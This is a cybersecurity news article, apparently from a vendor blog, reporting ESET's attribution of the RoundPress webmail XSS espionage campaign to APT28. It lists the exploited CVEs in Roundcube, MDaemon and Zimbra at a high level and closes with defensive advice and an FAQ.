2 min read
Russian hackers accused of global government email breach
Farah Amod
Jun 6, 2025 5:51:58 AM

Russian state-backed hackers used silent, email-based exploits to breach global government inboxes in a stealthy campaign now linked to APT28.
What happened
A newly uncovered cyberespionage operation called RoundPress has been attributed to the Russian state-sponsored hacking group APT28, also known as Fancy Bear. According to cybersecurity firm ESET, the campaign began in 2023 and extended through 2024, exploiting vulnerabilities in widely used webmail platforms to infiltrate the inboxes of government agencies and defense organizations across the globe.
Using both zero-day and known cross-site scripting (XSS) flaws, the hackers targeted platforms such as Roundcube, Horde, MDaemon, and Zimbra. Victims included government entities in Greece, Ukraine, Serbia, and Cameroon, along with military and critical infrastructure targets in Europe and South America.
Going deeper
The attack method was deceptively simple: victims received spear-phishing emails referencing current events. Embedded in these emails was malicious JavaScript, which automatically executed once the email was opened, no clicks or downloads required. The script exploited XSS vulnerabilities to steal credentials and sensitive data.
The payload harvested login details by triggering browser autofill functions, then scraped content from the victim’s inbox and settings. Stolen data, including two-factor authentication settings and password histories, was quietly exfiltrated to hardcoded command-and-control (C2) servers. Each variation of the attack script was tailored to the specific webmail software in use.
In the know
Vulnerabilities exploited included:
- Roundcube: CVE-2020-35730 and CVE-2023-43770 used to inject JavaScript into email content, triggered on open.
- MDaemon: CVE-2024-11182, a zero-day flaw that allowed credential theft and potential 2FA bypass.
- Zimbra: CVE-2024-27443 was exploited through a calendar invite vulnerability that enabled base64-encoded JavaScript execution.
- Horde: an older, unconfirmed flaw that attackers attempted but failed to exploit, likely due to recent patches.
Though there were no confirmed RoundPress incidents in 2025, ESET warns that similar methods remain viable due to the steady discovery of new XSS flaws in common webmail tools.
What was said
ESET researchers stated that the campaign could continue with minimal adjustments, noting: “As long as email remains a reliable attack vector and webmail clients contain exploitable flaws, campaigns like RoundPress are likely to persist.”
The group behind the campaign, APT28, is already sanctioned by the U.S. and European governments for past cyberespionage efforts, including interference in democratic elections and NATO-related targeting.
The big picture
RoundPress shows a growing cybersecurity risk: attacks that require no user interaction beyond opening an email. As organizations rely on browser-based communications, the threat of silent, automated credential theft becomes more severe. Governments and infrastructure providers remain top targets for state-sponsored hackers, particularly in times of geopolitical tension.
The campaign indicates the need for timely patching, zero-trust access models, and the deprecation of legacy webmail platforms vulnerable to XSS attacks.
FAQs
Who is APT28, and why are they significant?
APT28, also known as Fancy Bear, is a Russian military-linked hacking group known for high-profile cyberespionage campaigns, including election interference and attacks on NATO entities.
Why are webmail platforms frequent targets for cyberattacks?
Webmail platforms often contain unpatched vulnerabilities and are widely used in government and enterprise settings, making them attractive entry points for attackers seeking sensitive data.
What makes spear-phishing via email so effective in these attacks?
Spear-phishing emails can bypass user suspicion when tailored with current events, and in cases like RoundPress, no interaction beyond opening the email is needed to trigger the exploit.
What are XSS vulnerabilities, and how do hackers exploit them?
Cross-site scripting (XSS) flaws let attackers inject malicious scripts into trusted web apps. Hackers use XSS to execute JavaScript inside emails and steal login credentials.
What can organizations do to reduce exposure to these threats?
Steps include retiring outdated webmail software, applying patches promptly, using email content filters, and enforcing zero-trust security models across all user endpoints.